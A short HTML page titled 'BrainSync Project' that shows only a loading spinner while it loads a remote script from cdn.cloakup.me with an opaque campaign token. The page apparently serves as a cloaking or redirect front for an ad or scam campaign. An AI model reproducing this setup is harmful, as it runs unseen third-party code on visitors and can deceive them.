<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>BrainSync Project</title>

    <script src="https://cdn.cloakup.me/checker.js" data-campaign="db63284ccf5fafdb26289df8d9208650.6f0f930b6b38cd1d2ac8a65d29471837cd8a0fa71ac2de61dde23f895cf51803947ff51fa4896c42a78502f7a8cf5969bf16a08a6bbf44a76853ce5674298f2c5739f6aca34f"></script>

  </head>
  <body>
    <style>
        body {
        display: flex;
        flex-direction: column;
        align-items: center;
        background: #000;
        }

        .donut {
        width: 2rem;
        height: 2rem;
        margin: 2rem;
        border-radius: 50%;
        border: 0.3rem solid rgba(151, 159, 208, 0.3);
        border-top-color: #979fd0;
        -webkit-animation: 1.5s spin infinite linear;
                animation: 1.5s spin infinite linear;
        }
        .donut.multi {
        border-bottom-color: #979fd0;
        }

        @-webkit-keyframes spin {
        to {
            transform: rotate(360deg);
        }
        }

        @keyframes spin {
        to {
            transform: rotate(360deg);
        }
        }
    </style>

    <div class="donut"></div>

  </body>
</html>
